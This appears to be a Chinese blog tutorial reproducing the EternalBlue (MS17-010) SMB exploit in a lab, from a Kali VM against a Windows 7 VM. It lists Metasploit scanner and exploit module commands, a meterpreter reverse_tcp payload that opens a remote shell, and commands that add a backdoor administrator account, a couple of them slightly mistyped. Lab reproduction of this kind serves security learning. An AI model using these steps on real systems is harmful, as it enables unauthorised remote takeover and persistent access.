永恒之蓝漏洞复现

一.永恒之蓝(Eternal Blue)

永恒之蓝是在Windows的SMB服务处理v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二.复现环境

攻击机:Kali 192.168.158.128

靶机:Windows 7 192.168.158.129

实验条件:1.两台机子可以ping通 (如果ping不通检查虚拟机中设置-网络)

 3.防火墙(Windows 7虚拟机)是关闭的

4.在同一局域网

三.复现过程

1.nmap进行端口扫描,看445端口是否开启,如下图扫描到了445端口是开放的,而永恒之蓝就是利用445端口的smb服务,操作系统溢出漏洞。

2.进入MSF框架:    msfconsole

 3.使用ms17_010代码: search ms17_010

 

 4.这里会得到一些模块,我们用到的有

扫描模块:auxiliary/scanner/smb/smb_ms17_010

攻击模块:exploit/windows/smb/ms17_010_eternalblue

使用扫描模块:use 3

设置目标IP:set rhosts 192.168.158.129

执行扫描:run

 出现这条语句说明有漏洞

 

 接下来执行攻击模块 :use 0

如果出现这条语句: 

 则需要输入: set payload windows/x64/meterpreter/reverse_tcp

就可以继续执行攻击指令

设置攻击目标IP:set rhosts 192.168.158.129

执行攻击:run

5.这条指令说明攻击成功:   meterpreter 

 

6.得到靶机控制台:shell

有乱码,输入chcp 65001 解决乱码问题

现在就可以执行想要操作的指令了:

例如:创建一个用户:net user asdf 123456/add

将创建的用户asdf设为管理员: net localgroup administrator asdf /add

OK结束啦~谢谢观看

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值